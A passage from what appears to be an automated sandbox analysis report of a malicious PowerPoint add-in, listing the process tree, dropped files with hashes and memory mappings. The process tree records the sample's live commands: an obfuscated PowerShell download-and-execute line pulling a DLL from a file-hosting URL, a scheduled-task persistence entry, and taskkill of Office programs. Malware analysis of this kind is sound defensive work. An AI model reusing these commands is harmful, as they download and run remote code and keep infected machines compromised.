        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5928 /prefetch:8
        PID:5236
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5392 /prefetch:8
        Suspicious behavior: EnumeratesProcesses
        PID:5252
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6176 /prefetch:1
        PID:5388
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:1
        PID:5404
      • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
        "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Downloads\14 (1).ppam" /ou ""
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: AddClipboardFormatListener
        Suspicious use of SetWindowsHookEx
        PID:5572
        • C:\ProgramData\ddond.com
          C:\ProgramData\ddond.com https://taxfile.mediafire.com/file/v9m1dw47xgtetw9/14.htm/file
          Executes dropped EXE
          PID:4992
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $MMMMMMM=((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+'.'+'W'+'eb'+'c'+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+''+''+''+''+''+''+''+''+''+'o'+'w'+'n'+''+''+''+''+''+''+''+''+''+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).invoke((('https://www.mediafire.com/file/ivgr6qe4jfzd1w9/14.dll/file'))));Invoke-Expression $MMMMMMM
            PID:804
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 82 /tn calendersw /F /tr """C:\ProgramData\milon.com""""""https://www.mediafire.com/file/8pmejv253qhljtn/14.htm/file"""
            Creates scheduled task(s)
            PID:3180
          • C:\Windows\System32\taskkill.exe
            "C:\Windows\System32\taskkill.exe" /f /im WinWord.exe
            Kills process with taskkill
            PID:5860
          • C:\Windows\System32\taskkill.exe
            "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
            Kills process with taskkill
            PID:5928
          • C:\Windows\System32\taskkill.exe
            "C:\Windows\System32\taskkill.exe" /f /im POWERPNT.exe
            Kills process with taskkill
            PID:3828
      • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
        "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Downloads\14 (1).ppam" /ou ""
        PID:5732
      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5472 /prefetch:8
        PID:5756
      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
        Drops file in Program Files directory
        PID:5808
        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff759d75460,0x7ff759d75470,0x7ff759d75480
          PID:5924
      • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
        "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Downloads\14 (1).ppam" /ou ""
        PID:6016
      • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
        "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Downloads\14 (1).ppam" /ou ""
        PID:6084
      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5472 /prefetch:8
        Suspicious behavior: EnumeratesProcesses
        PID:5360
    • C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
      "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" /PRODUCT:Reader /VERSION:19.0 /MODE:3
      Suspicious use of SetWindowsHookEx
      PID:5176
      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"
        PID:4000
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    PID:5116
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
    PID:5348
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
        Execution
          Exfiltration
            Impact
              Initial Access
                Lateral Movement
                  Privilege Escalation
                    Replay Monitor
                    00:00 00:00
                    Downloads
                    • C:\ProgramData\ddond.com

                      MD5

                      0b4340ed812dc82ce636c00fa5c9bef2

                      SHA1

                      51c97ebe601ef079b16bcd87af827b0be5283d96

                      SHA256

                      dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

                      SHA512

                      d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

                    • C:\ProgramData\ddond.com

                      MD5

                      0b4340ed812dc82ce636c00fa5c9bef2

                      SHA1

                      51c97ebe601ef079b16bcd87af827b0be5283d96

                      SHA256

                      dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

                      SHA512

                      d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6

                      MD5

                      1fca0539de02091fc4d207211364e566

                      SHA1

                      61a6af3a2153a70277b7de7495ecef4110bb9989

                      SHA256

                      e6a9491850b7d6fc6bd7d592a8ff4fc057952a137abb7d3d39b3d0bb3b8f667b

                      SHA512

                      a1a657812f96ef839d793ffb6f249765ed24e906f5b3a22872c52e5b687480fdd7cc2334956e42198d70fa931f77ef50cbc8e1aaae6959ba3036a9035eeea823

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868

                      MD5

                      61bbc21b6075c76df0e0ed177c534185

                      SHA1

                      efcec703b65ae25e95736755f0fd80cdb5569c13

                      SHA256

                      0c2f98b4f41006d5bee3534e07ff7047cffd42c7f53f4ce6861d458e96457164

                      SHA512

                      a31af35f8fb5a566fa02c40156693db6ba54d75b8a3e3acac65cbc9e1d4eb9ea627f395bacfb3ac0b9854d9ef29f0e16ea958ebfe8201cff70096ff90ef61727

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE

                      MD5

                      c6f11751f23f273c02be06f64ca0e2f2

                      SHA1

                      43dd2140da95c53f964ef88db67187451581625f

                      SHA256

                      063e20533cd1e709c8c1965ccd1cfbff2b3c6a37683f03a244da1a5101a3bc81

                      SHA512

                      23e69bede2c1fee2f559f00aeb69c122f4c987c76d6455fa1ff484dc23008566b02edd93ee6a57c179c71e71114a0638c948900b4fff5b731ff99e81cbeae001

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6

                      MD5

                      6756c40edf649ec888c0e888446cacb9

                      SHA1

                      59ad25a4a9ff545995b5bcce1abd411e7f07060a

                      SHA256

                      794f4be6bac263da5983ef90891f923230f14f15b4c68b60c2248b834f0526d2

                      SHA512

                      af6022b791d65c83d50205c498dd8fd76d70e8cf7563b373024fd9887b8d9400d4b6cfd7cd72084a94447127afc1e1a3de28984af5eef1ae2a2ef182354a1ac9

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868

                      MD5

                      bfa52515350fe02ef978aed07e758049

                      SHA1

                      95972681781c46b22c5adc90bffed1e94f09d64c

                      SHA256

                      d584b8348f562647b43f0769750b05bafe94194188fe695aea3b1fff3c334eff

                      SHA512

                      28ba9afed478d4ab4f413de12040b27d7966eaa6958b96fa57bf430ad4a95f94cf3866f7a5e6e44b559ca5b30d383b26248d10ecdf5232194c786ef79f9f3245

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE

                      MD5

                      4dd1120e370440f036f0ff39feb41deb

                      SHA1

                      e715b0fd2932db814e29c1b55fb8b690970812d9

                      SHA256

                      17a92d4c5dd525dd6f795b9bd6428a6047f60e0515b939d39218ee740cd550be

                      SHA512

                      e4fae14b67ea0351d6cb18a84d95b13aa7bd1bddeed4f7da536afb9e336615c20416f8a6181a8c8538a4f33da1a1ff3ceb6facd576f8bffd37aab5115fd08903

                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                      MD5

                      0f2fd3ffef216b4a9345a3bf7c19e54c

                      SHA1

                      bb53767f6009d83c4af27ddb9f72b88d2dea8c1c

                      SHA256

                      4587b60ec8ed42f34c0c85604a70363bd7e82b5dac6b6e14629e3a5672b3e98a

                      SHA512

                      5987b7af8b369ad6208688a59562c6d187b45a64cc307af5d96da4cbfc6c146c71bcc493f9a66bf23d2d249416222bb728e9072a44a7d9a13355647768b32900

                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                      MD5

                      0f2fd3ffef216b4a9345a3bf7c19e54c

                      SHA1

                      bb53767f6009d83c4af27ddb9f72b88d2dea8c1c

                      SHA256

                      4587b60ec8ed42f34c0c85604a70363bd7e82b5dac6b6e14629e3a5672b3e98a

                      SHA512

                      5987b7af8b369ad6208688a59562c6d187b45a64cc307af5d96da4cbfc6c146c71bcc493f9a66bf23d2d249416222bb728e9072a44a7d9a13355647768b32900

                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                      MD5

                      0f2fd3ffef216b4a9345a3bf7c19e54c

                      SHA1

                      bb53767f6009d83c4af27ddb9f72b88d2dea8c1c

                      SHA256

                      4587b60ec8ed42f34c0c85604a70363bd7e82b5dac6b6e14629e3a5672b3e98a

                      SHA512

                      5987b7af8b369ad6208688a59562c6d187b45a64cc307af5d96da4cbfc6c146c71bcc493f9a66bf23d2d249416222bb728e9072a44a7d9a13355647768b32900

                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                      MD5

                      95e22ee8bac6765a868c13fc5ca5017c

                      SHA1

                      dff7d454639c700bb4408bf2cef900337977eb56

                      SHA256

                      cb320ebc79962dfd60205d687132b62ac884924f6cf5c5a40aea28fd2bc44802

                      SHA512

                      47fb43256f59834aaf626e3c9c9e20f71afbb018f64755d8e05f6cbd8dde21e1c14049192a90bffd99413a58a0cacebdd8bce7b3d464aa622d7eefad71145428

                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                      MD5

                      95e22ee8bac6765a868c13fc5ca5017c

                      SHA1

                      dff7d454639c700bb4408bf2cef900337977eb56

                      SHA256

                      cb320ebc79962dfd60205d687132b62ac884924f6cf5c5a40aea28fd2bc44802

                      SHA512

                      47fb43256f59834aaf626e3c9c9e20f71afbb018f64755d8e05f6cbd8dde21e1c14049192a90bffd99413a58a0cacebdd8bce7b3d464aa622d7eefad71145428

                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                      MD5

                      95e22ee8bac6765a868c13fc5ca5017c

                      SHA1

                      dff7d454639c700bb4408bf2cef900337977eb56

                      SHA256

                      cb320ebc79962dfd60205d687132b62ac884924f6cf5c5a40aea28fd2bc44802

                      SHA512

                      47fb43256f59834aaf626e3c9c9e20f71afbb018f64755d8e05f6cbd8dde21e1c14049192a90bffd99413a58a0cacebdd8bce7b3d464aa622d7eefad71145428

                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                      MD5

                      1c3983e2604936fa4420627b5fdcb6f5

                      SHA1

                      83991de09f6bae339679274f874188ff154d72f8

                      SHA256

                      6762e25a87c7acf43482319e524c55a25550d898762b78972f5771903697176c

                      SHA512

                      2e943097f3c98ba2591ea467effb4314025222c3bc4a10effc875cb0bba7899be7b09e2777a144854f3093d47cbde49d3a0d96ff06e674341d26f4af41290c4a

                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings

                      MD5

                      f222079e71469c4d129b335b7c91355e

                      SHA1

                      0056c3003874efef229a5875742559c8c59887dc

                      SHA256

                      e713c1b13a849d759ebaa6256773f4f1d6dfc0c6a4247edaa726e0206ecacb00

                      SHA512

                      e5a49275e056b6628709cf6509a5f33f8d1d1e93125eaa6ec1c7f51be589fd3d8ea7a59b9639db586d76a994ad3dc452c7826e4ac0c8c689dd67ff90e33f0b75

                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1

                      MD5

                      6698422bea0359f6d385a4d059c47301

                      SHA1

                      b1107d1f8cc1ef600531ed87cea1c41b7be474f6

                      SHA256

                      2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1

                      SHA512

                      d0cdb3fa21e03f950dbe732832e0939a4c57edc3b82adb7a556ebd3a81d219431a440357654dfea94d415ba00fd7dcbd76f49287d85978d12c224cbfa8c1ad8d

                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\synchronousLookupUris

                      MD5

                      95878acc2f35f7e0cab25eafa5a0015d

                      SHA1

                      e673cb8e7108c1df1e1f6c6dd038bdfae0b640af

                      SHA256

                      b732281984e203f7511780bc3622d4d96dcb1fad3c8bac69077572e16f71c1ff

                      SHA512

                      4e26bf0ba35e4a8900bd264527242a6e015d786b3c5a470188058097be68f55f7c8b8aaca607f2b8e0cf3b5caea80b4a1c12125ffe163ec4ebdaec6fb9079965

                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\synchronousLookupUris_637884115190248201

                      MD5

                      d8d19e98fc8a233efa5c1792813ed8b2

                      SHA1

                      3126b9b3144b2bb299930fa500408de8bf383827

                      SHA256

                      624e7f0f1df15e5dba4b8189a40d15949b143fb7ef866e26d76524bd5a1df3d1

                      SHA512

                      e09b774c107b8a1ab78cc4695e4690c54c80df8df8a13a1d2abac986ad0c309d3ed81f4e697d72054b6f5590ef01a7604f3d202096b12d69c92d860cd5cd9343

                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\topTraffic

                      MD5

                      ce545b52b20b2f56ffb26d2ca2ed4491

                      SHA1

                      ebe904c20bb43891db4560f458e66663826aa885

                      SHA256

                      e9d5684e543b573010f8b55b11bf571caf0a225cdea03f520091525978023899

                      SHA512

                      1ea06c8e3f03efdd67779969b4cdf7d8e08f8327298668a7cffd67d1753f33cf19e6995a3d83fe45185c55b950f41e48ac71b422b91e8d0180b5bdd07cfacfe9

                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\topTraffic_637811103879324684

                      MD5

                      a7aab197b91381bcdec092e1910a3d62

                      SHA1

                      35794f2d2df163223391a2b21e1610f14f46a78f

                      SHA256

                      6337fe4e6e7464e319dfcdadf472987592013cf80d44916f5151950b4a4ca14b

                      SHA512

                      cffd7350d1e69ada5f64cafe42a9d77e3192927e129f2903088b66b6efc9626b5d525aedca08d473ad8fa415af1d816594b243609237dc23716d70a2ca0eb774

                    • C:\Users\Admin\AppData\Local\Temp\6647D6D.tmp

                      MD5

                      0479715df4c22e9a75db1e132e8e9f74

                      SHA1

                      c7daced7176bb34f6839e1ee91f207c5359b05eb

                      SHA256

                      46759208a69138d6448963ca068b9e8328dd02896ceb1743489e3b9df36d448e

                      SHA512

                      e3365ec38729b8f47b88b0e64f2fe438c3402001920c6ad3ed53f8b93b4d8f3acd997c553b584572c0a697febb2da0aebf7d4f43a146c7330a47969644981501

                    • C:\Users\Admin\AppData\Local\Temp\7807D6D.tmp

                      MD5

                      0479715df4c22e9a75db1e132e8e9f74

                      SHA1

                      c7daced7176bb34f6839e1ee91f207c5359b05eb

                      SHA256

                      46759208a69138d6448963ca068b9e8328dd02896ceb1743489e3b9df36d448e

                      SHA512

                      e3365ec38729b8f47b88b0e64f2fe438c3402001920c6ad3ed53f8b93b4d8f3acd997c553b584572c0a697febb2da0aebf7d4f43a146c7330a47969644981501

                    • C:\Users\Admin\AppData\Local\Temp\7C47D6D.tmp

                      MD5

                      0479715df4c22e9a75db1e132e8e9f74

                      SHA1

                      c7daced7176bb34f6839e1ee91f207c5359b05eb

                      SHA256

                      46759208a69138d6448963ca068b9e8328dd02896ceb1743489e3b9df36d448e

                      SHA512

                      e3365ec38729b8f47b88b0e64f2fe438c3402001920c6ad3ed53f8b93b4d8f3acd997c553b584572c0a697febb2da0aebf7d4f43a146c7330a47969644981501

                    • C:\Users\Admin\Downloads\14 (1).ppam

                      MD5

                      66367046957810309248fcec536d7ccb

                      SHA1

                      5a118ce3f251140e852927503a3743442c68ff63

                      SHA256

                      26c3bd6b866dd452546949e169dfd0934cf53681fe53d63efa2a16db39cf131b

                      SHA512

                      1698fc41e4fe3bfd61841e9ec50a2461583d58cc5fafb00fb3c6a31460b0b866a7c96762da22de840f2081fb8524808e0177697860582aed6b33365a62f1fd08

                    • \??\pipe\LOCAL\crashpad_3484_KRNRFHMUSJHCEHAB

                      MD5

                      d41d8cd98f00b204e9800998ecf8427e

                      SHA1

                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                      SHA256

                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                      SHA512

                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                    • \??\pipe\LOCAL\crashpad_4500_JKXGEPWAYAAQMAIN

                      MD5

                      d41d8cd98f00b204e9800998ecf8427e

                      SHA1

                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                      SHA256

                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                      SHA512

                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                    • memory/216-130-0x0000000000000000-mapping.dmp

                    • memory/804-265-0x0000000000000000-mapping.dmp

                    • memory/1188-167-0x0000000000000000-mapping.dmp

                    • memory/1296-180-0x0000000000000000-mapping.dmp

                    • memory/1348-153-0x0000000000000000-mapping.dmp

                    • memory/1472-141-0x0000000000000000-mapping.dmp

                    • memory/1592-142-0x0000000000000000-mapping.dmp

                    • memory/1720-188-0x0000000000000000-mapping.dmp

                    • memory/1748-168-0x0000000000000000-mapping.dmp

                    • memory/2004-182-0x0000000000000000-mapping.dmp

                    • memory/2836-186-0x0000000000000000-mapping.dmp

                    • memory/3064-147-0x0000000000000000-mapping.dmp

                    • memory/3120-156-0x0000000000000000-mapping.dmp

                    • memory/3180-266-0x0000000000000000-mapping.dmp

                    • memory/3484-133-0x0000000000000000-mapping.dmp

                    • memory/3612-165-0x0000000000000000-mapping.dmp

                    • memory/3648-132-0x0000000000000000-mapping.dmp

                    • memory/3828-150-0x0000000000000000-mapping.dmp

                    • memory/3828-269-0x0000000000000000-mapping.dmp

                    • memory/4000-236-0x0000000000000000-mapping.dmp

                    • memory/4000-184-0x0000000000000000-mapping.dmp

                    • memory/4104-192-0x0000000000000000-mapping.dmp

                    • memory/4336-136-0x0000000000000000-mapping.dmp

                    • memory/4500-155-0x0000000000000000-mapping.dmp

                    • memory/4680-190-0x0000000000000000-mapping.dmp

                    • memory/4776-166-0x0000000000000000-mapping.dmp

                    • memory/4992-256-0x0000000000000000-mapping.dmp

                    • memory/5176-193-0x0000000000000000-mapping.dmp

                    • memory/5176-235-0x0000000000000000-mapping.dmp

                    • memory/5236-195-0x0000000000000000-mapping.dmp

                    • memory/5252-196-0x0000000000000000-mapping.dmp

                    • memory/5360-230-0x0000000000000000-mapping.dmp

                    • memory/5388-199-0x0000000000000000-mapping.dmp

                    • memory/5404-201-0x0000000000000000-mapping.dmp

                    • memory/5572-231-0x00007FFB3EDB0000-0x00007FFB3EDC0000-memory.dmp

                    • memory/5572-213-0x00007FFB41170000-0x00007FFB41180000-memory.dmp

                    • memory/5572-237-0x00007FFB3EDB0000-0x00007FFB3EDC0000-memory.dmp

                    • memory/5572-211-0x00007FFB41170000-0x00007FFB41180000-memory.dmp

                    • memory/5572-215-0x00007FFB41170000-0x00007FFB41180000-memory.dmp

                    • memory/5572-204-0x0000000000000000-mapping.dmp

                    • memory/5732-209-0x00007FFB41170000-0x00007FFB41180000-memory.dmp

                    • memory/5732-239-0x00007FFB41170000-0x00007FFB41180000-memory.dmp

                    • memory/5732-245-0x00007FFB41170000-0x00007FFB41180000-memory.dmp

                    • memory/5732-220-0x00007FFB41170000-0x00007FFB41180000-memory.dmp

                    • memory/5732-205-0x0000000000000000-mapping.dmp

                    • memory/5732-248-0x00007FFB41170000-0x00007FFB41180000-memory.dmp

                    • memory/5732-242-0x00007FFB41170000-0x00007FFB41180000-memory.dmp

                    • memory/5808-206-0x0000000000000000-mapping.dmp

                    • memory/5860-267-0x0000000000000000-mapping.dmp

                    • memory/5924-207-0x0000000000000000-mapping.dmp

                    • memory/5928-268-0x0000000000000000-mapping.dmp

                    • memory/6016-208-0x0000000000000000-mapping.dmp

                    • memory/6084-216-0x0000000000000000-mapping.dmp